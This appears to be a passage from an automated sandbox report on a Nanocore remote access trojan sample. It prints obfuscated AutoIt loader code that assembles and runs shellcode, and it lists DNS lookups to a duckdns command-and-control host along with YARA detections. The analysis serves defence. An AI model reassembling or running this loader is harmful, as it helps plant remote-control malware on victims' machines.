("Vitwxu11rtwxu11ttwxu11uatwxu11lAtwxu11ltwxu11loc" , "twxu11" , "" ) , $O353SY ("wsfw2ol5d5njl8h8p4depjqxw0fu" ) , 0 , $O353SY ("wasxt0b4ze638posik6j0tppb5vwn5" ) , $J323534391M ($O33393833KPWTZB ) , $O353SY ("uv7ly83bb" ) , $V39NUX ("0x30bf8fw6n0bf8fw6n0" , "bf8fw6n" , "" ) , $V3135P3 ("wzkvlsygitsmhsqbitf46g1rmqmdwordfbjp2nsjvyfccovfwbyr2ef7512k" , 28 + 4294958191 + 9105 , 5 + 4294958191 + 9105 ) , B38ZPPGU ("868432-868504-868436-868432-" , 868384 ) ) EXITLOOP CASE 854553390 $O33393833KPWTZB &= $D313630358SP $197553472 = 1296483263 CASE 947431475 $O33393833KPWTZB &= $V3135P3 ("68168y3kczf4jajbw5mnqn5ngs0zt775EB33C0EB038B46185F5E5DC20400558BEC81bp2rgz3khz51ldjf4xu" , 30 + 4294961161 + 6135 , 39 + 4294961161 + 6135 ) $197553472 = 961348210 CASE 961348210 $O33393833KPWTZB &= $O353SY ("x4aib2xbmf5tqjhk4l8h7pol" ) $197553472 = 540021528 CASE 1023162799 $O33393833KPWTZB &= $U3131F51ZD 
("s0rnk8fm0nkz61r46f0jqetgy70FFFFFF898508FFFFFF8D458089850CFFFFFF8D8578FFFFFF898510FFFFFF8D857CFF" , 25 + 4294964314 + 2982 ) $197553472 = 247051243 CASE 1065523592 $O33393833KPWTZB &= $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 
(87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) $197553472 = 694144588 CASE 1107033673 $O33393833KPWTZB &= $U3131F51ZD ("g6znlupzfjwplkdg480FF75E4FF55DC8945FC85C00F84FD010000FF7654FF751057FF55C433C93" , 18 + 134 * 1 + 4294967162 ) $197553472 = 1507971141 CASE 1119677627 $O33393833KPWTZB &= $I31330D6 ("FF8BF88D458850E819FFFFFF8BD8C78528FFFFFF793A3C0g48ahgue1e4a71" , 14 + 7632 + 4294959664 ) $197553472 = 1497642837 CASE 1170832963 $O33393833KPWTZB &= $Z37IB8K ("0x354636413333363638393435384335383641333236363839343539343538364132453541364136343636" ) $197553472 = 424398338 CASE 1178081240 LOCAL $O33393833KPWTZB = $Z31353236VY423T $197553472 = 317041254 CASE 1189059638 $O33393833KPWTZB &= $R313631310M $197553472 = 947431475 CASE 1191090362 $O33393833KPWTZB &= $U32333039GGK6 $197553472 = 1322325458 CASE 1296483263 $O33393833KPWTZB &= $O353SY ("wnn8k5e2q58ckt1nf" ) $197553472 = 1336094009 CASE 1322325458 $O33393833KPWTZB &= $B32333930C0N $197553472 = 1065523592 CASE 1336094009 $O33393833KPWTZB &= $O353SY ("mpgi338pxqjq5t" ) $197553472 = 1189059638 CASE 1344125600 $O33393833KPWTZB &= $O353SY ("z2m4o6cm3yybzpozilxjmq" ) $197553472 = 1023162799 CASE 1497642837 $O33393833KPWTZB &= $V39NUX 
("7jkszv88Djkszv845jkszv8Cjkszv84jkszv8C7jkszv885jkszv82jkszv8CFFFjkszv8Fjkszv8FFjkszv879jkszv84Ajkszv88jkszv8Ajkszv80jkszv8B8jkszv89jkszv885Ejkszv8Cjkszv8FEjkszv8Fjkszv8FFjkszv8Fjkszv88D4jkszv85D8898jkszv85jkszv8F0jkszv8Fjkszv8EFjkszv8Fjkszv8Fjkszv8Fjkszv88jkszv8D4jkszv85jkszv8Bjkszv888jkszv89jkszv88jkszv85jkszv8" , "jkszv8" , "" ) $197553472 = 1953304794 CASE 1507971141 $O33393833KPWTZB &= $V39NUX ("3C3vofsj0893vofsj4D3vofsjF3vofsj43vofsj63vofsj63vofsj3B3vofsj43vofsj6063vofsj73vofsj32E83vofsjB5D3vofsjC3vofsj83vofsj83vofsj33vofsjC3vofsj32C033vofsjDEF3vofsjF3vofsj733vofsjFC3vofsj8B0303vofsj343vofsj53vofsj10508B3vofsj43vofsj3F83vofsj033vofsjC3vofsj73vofsj50FF3vofsj53vofsj5C3vofsj43vofsj8B43vofsjDF48D53vofsj" , "3vofsj" , "" ) $197553472 = 31564936 CASE 1537586385 $O33393833KPWTZB &= $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 
(87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $197553472 = 1119677627 CASE 1566911474 $O33393833KPWTZB &= $V39NUX ("08D8pc1y5pc1yDpc1yCFBpc1yFFpc1yFpc1yFpc1yC7pc1y8pc1y5pc1yA8FEFpc1yFpc1yFF4400pc1y0pc1y0pc1y0050pc1yFF5pc1y5pc1yDpc1y8pc1y8pc1yBpc1y4D1pc1y03pc1y3pc1yD2pc1y" , "pc1y" , "" ) $197553472 = 511805355 CASE 1588307237 $O33393833KPWTZB &= $I31330D6 ("B4DF483E80841D1E8894DF43BC872BF8B4DF8034A040352043B8BA40000006A00894DF859729833DB53FFzhjsfri6q7pjng1ln3z6brmkdx7kih" , 30 + 4294965051 + 2245 ) $197553472 = 122734813 CASE 1597403880 $O33393833KPWTZB &= $Z37IB8K ("0x3830303030303533353746463535433038423835363446464646464638334638303530463836323046434646464633334330354635453542384245353544433230433030" ) $197553472 = 807257674 CASE 1629206375 $O33393833KPWTZB &= $L31393938EKFWEI $197553472 = 1940172472 CASE 1657267227 $O33393833KPWTZB &= $J313639321UOGL $197553472 = 128580426 CASE 1662106412 $O33393833KPWTZB &= $S31363938ET5K 
$197553472 = 1344125600 CASE 1728161007 $O33393833KPWTZB &= $Y31363930YK $197553472 = 1657267227 CASE 1739397950 $O33393833KPWTZB &= $I31330D6 ("50885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F5E5B8BEp4i2ikctkrcpuanuvn8f8" , 21 + 4294965780 + 1516 ) $197553472 = 268691428 CASE 1892817007 $O33393833KPWTZB &= $I31330D6 ("300000FF7650FF7634FF75E4FF55DC8945FC85C0754185DB7518FF7634FF75E4FF55B86A406800300000FF7650pa7hsunalkluwsg8qbg0l6gth5ed" , 28 + 4705 * 1 + 4294962591 ) $197553472 = 1969900180 CASE 1923293943 $O33393833KPWTZB &= $M323232301JA03B $197553472 = 67217268 CASE 1940172472 $O33393833KPWTZB &= $Z37IB8K ("0x42444138393535463833334330383935354434363633393131304639344330334434443541303030303046383434463033303030303333433033393136304639344330334435303435303030303046383433" ) $197553472 = 698963862 CASE 1953304794 $O33393833KPWTZB &= $O353SY ("u527utigfe3d3pa84x6ao" ) $197553472 = 1728161007 CASE 1969900180 $O33393833KPWTZB &= $O353SY ("q28wr6jf2lywptgl1h8tatqz" ) $197553472 = 1107033673 CASE 2049571787 $O33393833KPWTZB &= $V3135P3 ("je8vggetl36gn2wo2zucre6yi974248B463481E1FF0F0000030A2904398B45F40FB74C42088B433481E1FF0F0000030A0104398B42048gsc7q213kxujwag6dputk52" , 26 + 9424 * 2 + 4294948448 , 84 + 9424 * 2 + 4294948448 ) $197553472 = 1588307237 ENDSWITCH WEND IF NOT @ERROR AND $J32383034OP [0 ] THEN $J32383034OP = $J32383034OP [0 ] ELSE RETURN FALSE ENDIF $338561916 = 1178081240 WHILE 1 SWITCH $338561916 CASE 268691428 $B32343933BHRMQ ($C31KU765 (R37FLO7 (87387 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87330 ) ) , $U3131F51ZD ("ltecfrqptdword" , 9 + 6056 + 4294961240 ) , $Z37IB8K ("0x5669727475616C46726565" ) , $V3135P3 ("zzetxpw8f3au7ldcb1smdworddcvsn03m60be8sz" , 21 + 7395 * 1 + 4294959901 , 5 + 7395 * 1 + 4294959901 ) , $J32383034OP , $V3135P3 
("z3tmmm3ko66cocghf86wghnqe2h5dword6mfl7cc2f8" , 29 + 9129 * 4 + 4294930780 , 5 + 9129 * 4 + 4294930780 ) , 0 , $U3131F51ZD ("32rdli38qrn6mmg5bvzdword" , 19 + 4251 * 3 + 4294954543 ) , $O353SY ("2hg22lfktrnnxpyvagkmqvr" ) ) EXITLOOP CASE 274725409 $S32353233CD7VP0 ($C323830364EJ , $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87392 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87381 ) ) , $B3237393221GL ) $338561916 = 1739397950 CASE 317041254 LOCAL $C323830364EJ = $R323439367DKWBU ($N32333934XZLN & $B32343333SKG ($B3237393221GL ) & "]" ) $338561916 = 326133898 CASE 326133898 $S32353233CD7VP0 ($W32383035JOWY , $Z32333936EJ , $O33393833KPWTZB ) $338561916 = 274725409 CASE 1178081240 LOCAL $W32383035JOWY = $R323439367DKWBU ($Z37IB8K ("0x62797465207368656C6C636F64655B" ) & $J323534391M ($O33393833KPWTZB ) & "]" , $J32383034OP ) $338561916 = 317041254 CASE 1739397950 LOCAL $S32383033JPB = DLLCALLADDRESS ($V39NUX ("dfveyvn7wfveyvn7ofveyvn7rdfveyvn7" , "fveyvn7" , "" ) , $J32383034OP + $W323430361TZ2 , $O353SY ("nrxu5jurku5bkjha" ) , $R32373931PJ , $Z37IB8K ("0x77737472" ) , $F33393831BDEU , $Y323431328Z0R , $B32353137WR7K ($C323830364EJ ) ) $338561916 = 268691428 ENDSWITCH WEND IF NOT @ERROR AND $S32383033JPB [0 ] THEN RETURN $S32383033JPB [0 ] ELSE RETURN FALSE ENDIF ENDFUNC FUNC R37FLO7 ($K34353330SGUNI0 ) RETURN $K34353330SGUNI0 + 4294880016 ENDFUNC FUNC B38ZPPGU ($D34353332Y4OSXV , $L34353333OW06AX ) $274725409 = 1178081240 WHILE 1 SWITCH $274725409 CASE 317041254 LOCAL $K34353335IVCV2 $274725409 = 326133898 CASE 326133898 $K34353335IVCV2 = STRINGSPLIT ($D34353332Y4OSXV , "-" ) EXITLOOP CASE 1178081240 LOCAL $Y34353334ME = "" $274725409 = 317041254 ENDSWITCH WEND FOR $S343533386Z = 1 TO $K34353335IVCV2 [0 ] + 4294967295 STEP 1 $Y34353334ME &= $C31KU765 ($K34353335IVCV2 [$S343533386Z ] - $L34353333OW06AX ) NEXT RETURN $Y34353334ME ENDFUNC

        Network Behavior

        Network Port Distribution

        TCP Packets


        UDP Packets

        Apr 8, 2021 10:33:42.906069994 CEST53502908.8.8.8192.168.2.7
        Apr 8, 2021 10:33:43.557033062 CEST6042753192.168.2.78.8.8.8
        Apr 8, 2021 10:33:43.570374966 CEST53604278.8.8.8192.168.2.7
        Apr 8, 2021 10:33:44.121943951 CEST5620953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:44.134443045 CEST53562098.8.8.8192.168.2.7
        Apr 8, 2021 10:33:48.882797956 CEST5958253192.168.2.78.8.8.8
        Apr 8, 2021 10:33:48.895253897 CEST53595828.8.8.8192.168.2.7
        Apr 8, 2021 10:33:54.018465996 CEST6094953192.168.2.78.8.8.8
        Apr 8, 2021 10:33:54.031763077 CEST53609498.8.8.8192.168.2.7
        Apr 8, 2021 10:33:59.161456108 CEST5854253192.168.2.78.8.8.8
        Apr 8, 2021 10:33:59.174904108 CEST53585428.8.8.8192.168.2.7
        Apr 8, 2021 10:34:19.756982088 CEST5917953192.168.2.78.8.8.8
        Apr 8, 2021 10:34:19.936049938 CEST53591798.8.8.8192.168.2.7

        DNS Queries

        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
        Apr 8, 2021 10:32:16.614500999 CEST | 192.168.2.7 | 8.8.8.8 | 0xa866 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:21.873720884 CEST | 192.168.2.7 | 8.8.8.8 | 0x4513 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:26.820271015 CEST | 192.168.2.7 | 8.8.8.8 | 0x9fcf | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:48.033740044 CEST | 192.168.2.7 | 8.8.8.8 | 0x5fb1 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:52.913947105 CEST | 192.168.2.7 | 8.8.8.8 | 0xdf7b | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:57.861795902 CEST | 192.168.2.7 | 8.8.8.8 | 0xba79 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:18.536197901 CEST | 192.168.2.7 | 8.8.8.8 | 0xaad2 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:23.681402922 CEST | 192.168.2.7 | 8.8.8.8 | 0xb6dd | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:28.578886986 CEST | 192.168.2.7 | 8.8.8.8 | 0xc23e | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:48.882797956 CEST | 192.168.2.7 | 8.8.8.8 | 0x92c6 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:54.018465996 CEST | 192.168.2.7 | 8.8.8.8 | 0xdef1 | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:59.161456108 CEST | 192.168.2.7 | 8.8.8.8 | 0x66fe | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:34:19.756982088 CEST | 192.168.2.7 | 8.8.8.8 | 0x7d | Standard query (0) | nickdns22.duckdns.org | A (IP address) | IN (0x0001)

        DNS Answers

        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
        Apr 8, 2021 10:32:16.822741032 CEST | 8.8.8.8 | 192.168.2.7 | 0xa866 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:22.053880930 CEST | 8.8.8.8 | 192.168.2.7 | 0x4513 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:26.833659887 CEST | 8.8.8.8 | 192.168.2.7 | 0x9fcf | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:48.047174931 CEST | 8.8.8.8 | 192.168.2.7 | 0x5fb1 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:52.927352905 CEST | 8.8.8.8 | 192.168.2.7 | 0xdf7b | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:32:57.874805927 CEST | 8.8.8.8 | 192.168.2.7 | 0xba79 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:18.730227947 CEST | 8.8.8.8 | 192.168.2.7 | 0xaad2 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:23.862888098 CEST | 8.8.8.8 | 192.168.2.7 | 0xb6dd | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:28.592192888 CEST | 8.8.8.8 | 192.168.2.7 | 0xc23e | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:48.895253897 CEST | 8.8.8.8 | 192.168.2.7 | 0x92c6 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:54.031763077 CEST | 8.8.8.8 | 192.168.2.7 | 0xdef1 | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:33:59.174904108 CEST | 8.8.8.8 | 192.168.2.7 | 0x66fe | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)
        Apr 8, 2021 10:34:19.936049938 CEST | 8.8.8.8 | 192.168.2.7 | 0x7d | No error (0) | nickdns22.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001)

        Code Manipulations

        Statistics

        Behavior

        System Behavior

        General

        Start time: 10:32:09
        Start date: 08/04/2021
        Path: C:\Users\user\Desktop\qnJXJsqt1M.exe
        Wow64 process (32bit): true
        Commandline: 'C:\Users\user\Desktop\qnJXJsqt1M.exe'
        Imagebase: 0xad0000
        File size: 1253376 bytes
        MD5 hash: E98CE8A425D942E7337ECBD309707E25
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
